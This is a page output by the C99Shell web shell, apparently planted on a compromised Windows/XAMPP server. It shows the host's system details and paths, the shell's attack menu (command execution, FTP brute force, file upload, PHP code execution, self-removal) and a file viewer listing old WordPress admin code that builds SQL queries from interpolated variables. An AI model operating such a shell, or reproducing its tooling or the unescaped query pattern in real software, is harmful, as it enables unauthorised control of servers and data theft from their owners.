!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\jaime\wordpress\wp-admin\   drwxrwxrwx
Free 4.03 GB of 39.52 GB (10.21%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admin-db.php (9.16 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

function get_users_drafts$user_id ) {
    global 
$wpdb;
    
$user_id = (int) $user_id;
    
$query "SELECT ID, post_title FROM $wpdb->posts WHERE post_status = 'draft' AND post_author = $user_id ORDER BY ID DESC";
    
$query apply_filters('get_users_drafts'$query);
    return 
$wpdb->get_results$query );
}

function 
get_others_drafts$user_id ) {
    global 
$wpdb;
    
$user get_userdata$user_id );
    
$level_key $wpdb->prefix 'user_level';

    
$editable get_editable_user_ids$user_id );
    
    if( !
$editable ) {
        
$other_drafts '';
    } else {
        
$editable join(','$editable);
        
$other_drafts $wpdb->get_results("SELECT ID, post_title FROM $wpdb->posts WHERE post_status = 'draft' AND post_author IN ($editable) AND post_author != '$user_id' ");
    }

    return 
apply_filters('get_others_drafts'$other_drafts);
}

function 
get_editable_authors$user_id ) {
    global 
$wpdb;

    
$editable get_editable_user_ids$user_id );

    if( !
$editable ) {
        return 
false;
    } else {
        
$editable join(','$editable);
        
$authors $wpdb->get_results"SELECT * FROM $wpdb->users WHERE ID IN ($editable)" );
    }

    return 
apply_filters('get_editable_authors'$authors);
}

function 
get_editable_user_ids$user_id$exclude_zeros true ) {
    global 
$wpdb;
    
    
$user = new WP_User$user_id );
    
    if ( ! 
$user->has_cap('edit_others_posts') ) {
        if ( 
$user->has_cap('edit_posts') || $exclude_zeros == false )
            return array(
$user->id);
        else 
            return 
false;
    }

    
$level_key $wpdb->prefix 'user_level';

    
$query "SELECT user_id FROM $wpdb->usermeta WHERE meta_key = '$level_key'";
    if ( 
$exclude_zeros )
        
$query .= " AND meta_value != '0'";
        
    return 
$wpdb->get_col$query );
}

function 
get_author_user_ids() {
    global 
$wpdb;
    
$level_key $wpdb->prefix 'user_level';

    
$query "SELECT user_id FROM $wpdb->usermeta WHERE meta_key = '$level_key' AND meta_value != '0'";

    return 
$wpdb->get_col$query );
}

function 
get_nonauthor_user_ids() {
    global 
$wpdb;
    
$level_key $wpdb->prefix 'user_level';

    
$query "SELECT user_id FROM $wpdb->usermeta WHERE meta_key = '$level_key' AND meta_value = '0'";

    return 
$wpdb->get_col$query );
}

function 
wp_insert_category($catarr) {
    global 
$wpdb;

    
extract($catarr);

    
$cat_ID = (int) $cat_ID;

    
// Are we updating or creating?
    
if (!empty ($cat_ID))
        
$update true;
    else
        
$update false;

    
$cat_name wp_specialchars($cat_name);

    if (empty (
$category_nicename))
        
$category_nicename sanitize_title($cat_name);
    else
        
$category_nicename sanitize_title($category_nicename);

    if (empty (
$category_description))
        
$category_description '';

    if (empty (
$category_parent))
        
$category_parent 0;

    if (!
$update) {
        
$wpdb->query("INSERT INTO $wpdb->categories (cat_ID, cat_name, category_nicename, category_description, category_parent) VALUES ('0', '$cat_name', '$category_nicename', '$category_description', '$category_parent')");
        
$cat_ID $wpdb->insert_id;
    } else {
        
$wpdb->query ("UPDATE $wpdb->categories SET cat_name = '$cat_name', category_nicename = '$category_nicename', category_description = '$category_description', category_parent = '$category_parent' WHERE cat_ID = '$cat_ID'");
    }
    
    if ( 
$category_nicename == '' ) {
        
$category_nicename sanitize_title($cat_name$cat_ID );
        
$wpdb->query"UPDATE $wpdb->categories SET category_nicename = '$category_nicename' WHERE cat_ID = '$cat_ID'" );
    }

    
wp_cache_delete($cat_ID'category');

    if (
$update) {
        
do_action('edit_category'$cat_ID);
    } else {
        
wp_cache_delete('all_category_ids''category');
        
do_action('create_category'$cat_ID);
        
do_action('add_category'$cat_ID);
    }

    return 
$cat_ID;
}

function 
wp_update_category($catarr) {
    global 
$wpdb;

    
$cat_ID = (int) $catarr['cat_ID'];

    
// First, get all of the original fields
    
$category get_category($cat_IDARRAY_A);

    
// Escape data pulled from DB.
    
$category add_magic_quotes($category);

    
// Merge old and new fields with new fields overwriting old ones.
    
$catarr array_merge($category$catarr);

    return 
wp_insert_category($catarr);
}

function 
wp_delete_category($cat_ID) {
    global 
$wpdb;

    
$cat_ID = (int) $cat_ID;

    
// Don't delete the default cat.
    
if (== $cat_ID)
        return 
0;

    
$category get_category($cat_ID);

    
$parent $category->category_parent;

    
// Delete the category.
    
$wpdb->query("DELETE FROM $wpdb->categories WHERE cat_ID = '$cat_ID'");

    
// Update children to point to new parent.
    
$wpdb->query("UPDATE $wpdb->categories SET category_parent = '$parent' WHERE category_parent = '$cat_ID'");

    
// TODO: Only set categories to general if they're not in another category already
    
$wpdb->query("UPDATE $wpdb->post2cat SET category_id='1' WHERE category_id='$cat_ID'");

    
wp_cache_delete($cat_ID'category');
    
wp_cache_delete('all_category_ids''category');

    
do_action('delete_category'$cat_ID);

    return 
1;
}

function 
wp_create_category($cat_name) {
    
$cat_array compact('cat_name');
    return 
wp_insert_category($cat_array);
}

function 
wp_create_categories($categories$post_id '') {
    
$cat_ids = array ();
    foreach (
$categories as $category) {
        if (
$id category_exists($category))
            
$cat_ids[] = $id;
        else
            if (
$id wp_create_category($category))
                
$cat_ids[] = $id;
    }

    if (
$post_id)
        
wp_set_post_cats(''$post_id$cat_ids);

    return 
$cat_ids;
}

function 
category_exists($cat_name) {
    global 
$wpdb;
    if (!
$category_nicename sanitize_title($cat_name))
        return 
0;

    return 
$wpdb->get_var("SELECT cat_ID FROM $wpdb->categories WHERE category_nicename = '$category_nicename'");
}

function 
wp_delete_user($id$reassign 'novalue') {
    global 
$wpdb;

    
$id = (int) $id;
    
$user get_userdata($id);

    if (
$reassign == 'novalue') {
        
$post_ids $wpdb->get_col("SELECT ID FROM $wpdb->posts WHERE post_author = $id");

        if (
$post_ids) {
            foreach (
$post_ids as $post_id)
                
wp_delete_post($post_id);
        }

        
// Clean links
        
$wpdb->query("DELETE FROM $wpdb->links WHERE link_owner = $id");
    } else {
        
$reassign = (int) $reassign;
        
$wpdb->query("UPDATE $wpdb->posts SET post_author = {$reassign} WHERE post_author = {$id}");
        
$wpdb->query("UPDATE $wpdb->links SET link_owner = {$reassign} WHERE link_owner = {$id}");
    }

    
// FINALLY, delete user
    
$wpdb->query("DELETE FROM $wpdb->users WHERE ID = $id");
    
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE user_id = '$id'");

    
wp_cache_delete($id'users');
    
wp_cache_delete($user->user_login'userlogins');

    
do_action('delete_user'$id);

    return 
true;
}

function 
get_link($link_id$output OBJECT) {
    global 
$wpdb;
    
    
$link $wpdb->get_row("SELECT * FROM $wpdb->links WHERE link_id = '$link_id'");

    if ( 
$output == OBJECT ) {
        return 
$link;
    } elseif ( 
$output == ARRAY_A ) {
        return 
get_object_vars($link);
    } elseif ( 
$output == ARRAY_N ) {
        return 
array_values(get_object_vars($link));
    } else {
        return 
$link;
    }
}

function 
wp_insert_link($linkdata) {
    global 
$wpdb$current_user;
    
    
extract($linkdata);

    
$update false;
    if ( !empty(
$link_id) )
        
$update true;

    if ( empty(
$link_rating) )
        
$link_rating 0;    

    if ( empty(
$link_target) )
        
$link_target '';    

    if ( empty(
$link_visible) )
        
$link_visible 'Y';
        
    if ( empty(
$link_owner) )
        
$link_owner $current_user->id;

    if ( empty(
$link_notes) )
        
$link_notes '';

    if ( 
$update ) {
        
$wpdb->query("UPDATE $wpdb->links SET link_url='$link_url',
            link_name='
$link_name', link_image='$link_image',
            link_target='
$link_target', link_category='$link_category',
            link_visible='
$link_visible', link_description='$link_description',
            link_rating='
$link_rating', link_rel='$link_rel',
            link_notes='
$link_notes', link_rss = '$link_rss'
            WHERE link_id='
$link_id'");
    } else {
        
$wpdb->query("INSERT INTO $wpdb->links (link_url, link_name, link_image, link_target, link_category, link_description, link_visible, link_owner, link_rating, link_rel, link_notes, link_rss) VALUES('$link_url','$link_name', '$link_image', '$link_target', '$link_category', '$link_description', '$link_visible', '$link_owner', '$link_rating', '$link_rel', '$link_notes', '$link_rss')");
        
$link_id $wpdb->insert_id;
    }
    
    if ( 
$update )
        
do_action('edit_link'$link_id);
    else
        
do_action('add_link'$link_id);

    return 
$link_id;
}

function 
wp_update_link($linkdata) {
    global 
$wpdb;

    
$link_id = (int) $linkdata['link_id'];
    
    
$link get_link($link_idARRAY_A);
    
    
// Escape data pulled from DB.
    
$link add_magic_quotes($link);
    
    
// Merge old and new fields with new fields overwriting old ones.
    
$linkdata array_merge($link$linkdata);

    return 
wp_insert_link($linkdata);
}

function 
wp_delete_link($link_id) {
    global 
$wpdb;

    
do_action('delete_link'$link_id);
    return 
$wpdb->query("DELETE FROM $wpdb->links WHERE link_id = '$link_id'");    
}

function 
post_exists($title$content ''$post_date '') {
    global 
$wpdb;

    if (!empty (
$post_date))
        
$post_date "AND post_date = '$post_date'";

    if (!empty (
$title))
        return 
$wpdb->get_var("SELECT ID FROM $wpdb->posts WHERE post_title = '$title$post_date");
    else
        if (!empty (
$content))
            return 
$wpdb->get_var("SELECT ID FROM $wpdb->posts WHERE post_content = '$content$post_date");

    return 
0;
}

function 
comment_exists($comment_author$comment_date) {
    global 
$wpdb;

    return 
$wpdb->get_var("SELECT comment_post_ID FROM $wpdb->comments
            WHERE comment_author = '
$comment_author' AND comment_date = '$comment_date'");
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--